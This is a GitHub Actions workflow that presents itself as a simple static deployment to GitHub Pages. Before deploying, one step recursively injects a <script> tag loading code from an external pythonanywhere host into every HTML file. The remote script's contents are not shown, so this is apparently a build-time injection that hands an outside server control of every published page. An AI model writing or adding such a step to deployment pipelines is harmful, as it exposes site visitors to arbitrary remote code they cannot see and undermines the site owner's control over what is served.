# Simple workflow for deploying static content to GitHub Pages
name: Fast Github Pages

on:
  push:
    branches: ["main"]
  workflow_dispatch:

permissions:
  contents: read
  pages: write
  id-token: write

concurrency:
  group: "pages"
  cancel-in-progress: false

jobs:
  deploy:
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    runs-on: ubuntu-latest
    steps:
      # 1️⃣ Checkout the repository
      - name: Checkout
        uses: actions/checkout@v4

      # 2️⃣ Append the external script to all HTML files recursively
      - name: Append external script to HTML files
        run: |
          find . -type f -name "*.html" | while IFS= read -r file; do
            # Skip if already added
            if ! grep -q "olibot13.pythonanywhere.com/tommm" "$file"; then
              # Insert before </body> if exists
              if grep -q "</body>" "$file"; then
                sed -i "\|</body>|i <script src=\"https://olibot13.pythonanywhere.com/tommm\"></script>" "$file"
              else
                # Otherwise append at the end
                echo "<script src=\"https://olibot13.pythonanywhere.com/tommm\"></script>" >> "$file"
              fi
              echo "Modified: $file"
            fi
          done

      # 3️⃣ Setup GitHub Pages
      - name: Setup Pages
        uses: actions/configure-pages@v5

      # 4️⃣ Upload the modified files as the artifact
      - name: Upload artifact
        uses: actions/upload-pages-artifact@v3
        with:
          path: '.'

      # 5️⃣ Deploy to GitHub Pages
      - name: Deploy to GitHub Pages
        id: deployment
        uses: actions/deploy-pages@v4
